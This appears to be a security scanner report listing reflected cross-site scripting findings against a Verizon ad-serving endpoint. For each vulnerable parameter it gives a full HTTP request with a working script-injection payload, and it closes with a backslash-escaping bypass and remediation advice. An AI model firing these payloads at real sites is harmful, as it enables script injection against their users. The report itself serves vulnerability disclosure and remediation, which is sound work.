GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:50:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94696"><script>alert(1)</script>f2fcdc1fb36 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:50:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d47"><script>alert(1)</script>810ed66b159 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862d1"><script>alert(1)</script>ce12940af71 was submitted in the pts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:56:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a25"><script>alert(1)</script>030f87d661d was submitted in the pws parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55331"><script>alert(1)</script>3099bd94315 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:58:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a8c"><script>alert(1)</script>afe03052625 was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:56:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98904"><script>alert(1)</script>6476ec4b36d was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd524"><script>alert(1)</script>db31b89a21 was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1358 Content-Type: text/html Cache-Control: private Content-Length: 1358
The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c3a7"><script>alert(1)</script>6769bca969e was submitted in the usertype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da1a"><script>alert(1)</script>d0153c69ecc was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:53:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59812"><script>alert(1)</script>b6620b35637 was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e095"><script>alert(1)</script>1f394cc321d was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff424"><script>alert(1)</script>ef31f985b3 was submitted in the viss parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a690"><script>alert(1)</script>2618c9bf78 was submitted in the webex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f4c"><script>alert(1)</script>718101defe9 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63c88\'%3balert(1)//ae87b284984 was submitted in the page parameter. This input was echoed as 63c88\\';alert(1)//ae87b284984 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
